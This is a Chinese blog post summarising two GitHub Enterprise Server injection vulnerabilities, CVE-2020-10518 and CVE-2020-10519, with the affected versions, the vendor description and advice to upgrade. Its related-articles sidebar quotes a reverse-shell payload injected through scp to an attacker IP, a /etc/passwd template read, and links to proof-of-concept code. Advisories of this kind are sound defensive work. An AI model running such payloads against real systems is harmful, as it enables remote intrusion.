CVE-2020-10518, CVE-2020-10519(github特殊元素漏洞)

最新推荐文章于 2024-04-15 02:07:14 发布
最新推荐文章于 2024-04-15 02:07:14 发布
阅读量182 收藏
点赞数
分类专栏: 漏洞解决 文章标签: java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43210388/article/details/127962996
版权

参考链接:
github 输出中的特殊元素转义处理不恰当(注入)
github 在命令中使用的特殊元素转义处理不恰当(命令注入)
Vulnerability Details : CVE-2020-10518
Vulnerability Details : CVE-2020-10519

漏洞影响范围:
GitHub Enterprise Server < 2.22

漏洞级别:
阿里云ARMS显示高级
阿里云漏洞库未评级
cvedetails评分:
CVE-2020-10518
在这里插入图片描述
CVE-2020-10519
在这里插入图片描述

备注:
CVSS得分基于一系列维度上的测量结果,这些测量维度被称为量度(Metrics)。
漏洞的最终得分最大为10,最小为0。
得分7~10的漏洞通常被认为比较严重
得分在4~6.9之间的是中级漏洞
得分0~3.9的则是低级漏洞

漏洞描述:
A remote code execution vulnerability was identified in GitHub Enterprise Server that could be exploited when building a GitHub Pages site. User-controlled configuration of the underlying parsers used by GitHub Pages were not sufficiently restricted and made it possible to execute commands on the GitHub Enterprise Server instance. To exploit this vulnerability, an attacker would need permission to create and build a GitHub Pages site on the GitHub Enterprise Server instance. This vulnerability affected all versions of GitHub Enterprise Server prior to 2.22 and was fixed in 2.21.6, 2.20.15, and 2.19.21. The underlying issues contributing to this vulnerability were identified both internally and through the GitHub Security Bug Bounty program.

解决方案:
如果未使用GitHub Enterprise Server,则不需要修复
如果使用了,更新当前系统或软件至最新版,完成漏洞的修复

一枝花傲寒
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
matlab信任模型代码-awesome-stars:我的GitHub明星精选清单!
05-22
matlab信任模型代码很棒的星星 我的GitHub明星精选清单! 产生者 内容 C -新的可启动USB解决方案。 -音频编辑器 -NVIDIA GPU上的稀疏体积计算和渲染 -Apache NuttX Apps是工具,外壳,网络实用程序,库,解释器的集合,可与NuttX RTOS一起使用 -WebAssembly微型运行时(WAMR) -C语言的ROS客户端库。 -通用命令行非JVM Apache Kafka生产者和使用者 -即时终端共享 -GoAccess是实时Web日志分析器和交互式查看器,可在* nix系统的终端中或通过浏览器运行。 -开膛手约翰(John the Ripper jumbo)-先进的离线密码破解程序,它支持数百种哈希和密码类型,并且可以在许多操作系统,CPU,GPU甚至某些FPGA上运行 -官方漏洞利用数据库存储库 -ESP8266的替代固件,具有使用webUI的轻松配置,OTA更新,使用计时器或规则的自动化,可扩展性以及对MQTT,HTTP,串行或KNX的完全本地控制。 完整文档位于 -生成多个文件系统并从树中刷新图像的工具 -用于python,circuit
GitHub 修复允许任意代码执行的漏洞;微软暂停推送 10 月更新
redditnote的博客
10-07 90
(点击上方蓝字,快速关注我们)转自:开源中国、solidot、cnBeta、腾讯科技等0、GitHub 修复了允许任意代码执行的安全漏洞GitHub的安全列表表示,如果执...
GitHub增加了自动漏洞代码扫描功能
kafankeji的博客
01-11 314
GitHub的其他安全新闻中,该公司于2022年5月开始实施双因素身份验证(2FA),最近又开始实施私人漏洞报告。这项新功能被称为默认设置,它简化了在使用Python、JavaScript和Ruby的存储库上启动代码扫描的过程。该公司还澄清说,通过.yaml文件手动扫描仍然是可能的,但现在是在高级选项下,可以自定义代码扫描。据GitHub称,这项新功能是该公司构建安全工具的努力的一部分,为开发人员提供无障碍的体验。新功能已经在存储库的设置选项卡的安全标题下的代码安全和分析部分中可用。
GitHub漏洞!4行代码轰炸出6千万封电子邮件
a934079371的博客
06-24 1246
整理|燕珊(infoQ)又一场波及数十万人的电子邮件风暴(Email storm)意外发生,这次的地点是在 GitHub 平台,事件主角是一位仅 18 岁的来自印度的年轻开发者 Rohith Sreedharan,他近日不小心给 GitHub 上约 40 万名用户发送了电子邮件。 事件起因 6 月 3 日,Rohith Sreedharan 向游戏公司 Epi...
zlib、OpenSSL漏洞及解决
c123m的专栏
12-13 5286
1. 漏洞描述 CVE:CVE-2016-9843。 zlib 1.2.8版本中存在拒绝服务漏洞。攻击者可利用该漏洞造成受影响的应用程序崩溃,导致拒绝服务。 CVE:CVE-2020-1967。OpenSSL 1.1.1d版本、1.1.1e版本和1.1.1f版本中的‘SSL_check_chain()’函数存在代码问题漏洞。远程攻击者可利用该漏洞导致服务器或客户端应用程序崩溃。 2. 解决 2.1 zlib 下载zlib-1.2.11,并解压 [root@vt12 ~]# wget http...
github pages markdown_赏金$25000的GitHub漏洞:通过 GitHub Pages 不安全的Kramdown配置实现多个RCE...
weixin_39841136的博客
11-22 135
0x01 开篇我一直在关注GitHub企业版的发布说明,主要关注补丁的bug修复。这次,我发现补丁发布对Kramdown中的一个问题进行了关键修复。CVE-2020-14001的描述很好地总结了漏洞详情以及如何利用:Ruby 2.3.0版本之前的kramdown gem默认执行Kramdown文档中的模板配置,允许任意的读取访问(比如template=”/etc/passwd)或任意嵌入...
查看openssh版本_OpenSSH命令注入漏洞复现(CVE202015778)
weixin_39707536的博客
12-06 1583
OpenSSH命令注入漏洞复现(CVE-2020-15778)目录漏洞描述漏洞等级漏洞影响版本漏洞复现修复建议▶漏洞描述 OpenSSH是用于使用SSH协议进行远程登录的一个开源实现。通过对交互的流量进行加密防止窃听,连接劫持以及其他攻击。OpenSSH由OpenBSD项目的一些开发人员开发, 并以BSD样式的许可证提供,且已被集成到许多商业产品中。 2020年6月9日,研...
CVE-2020-15778漏洞复现
臭nana的博客
08-04 1万+
产品:Openssh 影响的组件:SCP 漏洞版本:<= openssh-8.3p1 scp命令引发的命令注入 反弹shell的payload scp 1.txt cracer@受害机ip:'`bash -i >& /dev/tcp/攻击机ip/4444 0>&1`/tmp/test.txt' 实战测试,这里使用本机进行测试 1、查看ssh版本,符合漏洞版本 ssh -V 2、先在本地新建好文件,用于上传 2、本地开启监听 3、使用s.
CVE-2020-16898: Windows TCP/IP远程执行代码漏洞通告
爱国小白帽
10-14 6668
原创 360CERT [三六零CERT](javascript:void(0)???? 今天 报告编号:B6-2020-101402 报告来源:360CERT 报告作者:360CERT 更新日期:2020-10-14 0x01 漏洞简述 2020年10月14日,360CERT监测发现 Microsoft 发布了 TCP/IP远程代码执行漏洞 的风险通告,该漏洞编号为CVE-2020-16875,漏洞等级:严重,漏洞评分:9.8。 远程攻击者通过构造特制的ICMPv6 Router Advertisemen
追洞小组 | 实战CVE-2020-16898漏洞复现
Ms08067安全实验室
02-25 1299
三连一下,一起学安全文章来源|MS08067 WEB攻防知识星球本文作者:M-101(Ms08067实验室追洞小组成员) 漏洞复现分析 认准追洞小组漏洞名称Window...
CVE-2020-11651:CVE-2020-11651
04-15
适用于未分散盐版本的安装git clone https://github.com/0xc0d/CVE-2020-11651.git ~/CVE-2020-11651chmod +x ~/CVE-2020-11651/PoC.py用法$ ~/CVE-2020-11651/PoC.py -husage: PoC.py [-h] --host HOST [--port ...
CVE-2020-0688 Exchange RCE 任意命令执行
03-29
# CVE-2020-0688 Exchange RCE 前提: 已知一个域用户 影响版本: -Microsoft Exchange Server 2010 Service Pack 3 Update Rollup 30 -Microsoft Exchange Server 2013 Cumulative Update 23 -Microsoft ...
CVE-2020-2883:Weblogic coherence.jar RCE
04-13
CVE-2020-2883 先克隆框架 git clone https://github.com/Y4er/CVE-2020-2555 然后将 CVE_2020_2883.java 放到 src/com/supeream/CVE_2020_2883.java 目录下 导入idea运行 CVE_2020_2883.java RCE! 截图
CVE-2020-9484
04-13
CVE-2020-9484(Tomcat) 仅用于...跑步$ git clone https://github.com/masahiro331/CVE-2020-9484.git$ cd CVE-2020-9484$ docker build -t tomcat:groovy .$ docker run -d -p 8080:8080 tomcat:groovy开发$ curl '...
CVE-2020-14368:Eclipse CHE的交互式RCE漏洞演示
05-15
CSWSH-THEIA-CVE-2020-14368 报告目标:可在che.openshift.io上获得Eclipse CHE部署漏洞类型:跨站点Websocket劫持发现日期:2020-04-08 作者:Robin Duda(codingchili @ github)概括Eclipse CHE adn Theia中的/ ...
CORS 错误配置漏洞扫描器,Github上最值得学习的10个HarmonyOS鸿蒙开源项目
最新发布
2401_84159911的博客
04-15 346
*如果我们给students表增加一行,并添加class_id=5,由于classes表并不存在id=5的行,所以,LEFT OUTER JOIN的结果会增加一行,对应的class_name是NULL。,由于students表的class_id包含1,2,3,classes表的id包含1,2,3,4,所以,INNER JOIN根据条件s.class_id = c.id返回的结果集仅包含1,2,3。有RIGHT OUTER JOIN,就有LEFT OUTER JOIN,以及FULL OUTER JOIN。
DeleCMS织梦系统后台漏洞解决
webxiaoma
12-23 2334
背景:DeleCMS织梦系统后台漏洞挺多的,如果我们处理不好,很容易被别人黑了网站,所以网站的安全性是很重要的! 直接上解决方法:    第一步:我们解决一下织梦系统给我们提示的一些安全要求           1.目前data、uploads有执行.php权限,非常危险,需要立即取消目录的执行权限!         操作连接地址:http://help.dedecms
Centos7系统安全漏洞及修复方案
热门推荐
sara的博客
04-20 2万+
以下所有漏洞均为Centos7的系统漏洞修复,为离线内网环境;某些服务由Docker镜像部署。 1、Docker Remote API 未授权访问漏洞【原理扫描】 详细描述 Docker是一个开源的应用容器引擎,让开发者可以打包他们的应用以及依赖包到一个可移植的容器中,然后发布到任何流行的LINUX机器上,也可以实现虚拟化。 Docker swarm 是一个将docker集群变成单一虚拟的docker host工具,使用标准的Docker API,能够方便docker集.
来自GitHub的系列渗透测试工具
qq_53058639的博客
02-07 1259
Printer Exploitation Toolkit (PRET) - 用于打印机安全测试的工具,能够进行IP和USB连接,模糊测试以及利用PostScript,PJL和PCL打印机语言功能。THC Hydra - 在线密码破解工具,内置支持许多网络协议,包括HTTP,SMB,FTP,telnet,ICQ,MySQL,LDAP,IMAP,VNC等。PacketTotal - 简单,免费,高质量的数据包捕获文件分析,有助于快速检测网络传播的恶意软件(使用Bro和Suricata IDS签名)。
Tomact_CVE-2020-1938漏洞复现
08-31
要复现Tomact_CVE-2020-1938漏洞,可以按照以下步骤进行操作: 1. 下载POC:可以使用以下命令下载POC文件: git clone https://github.com/sv3nbeast/CVE-2020-1938-Tomact-file_include-file_read/ 2. 在攻击机上...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值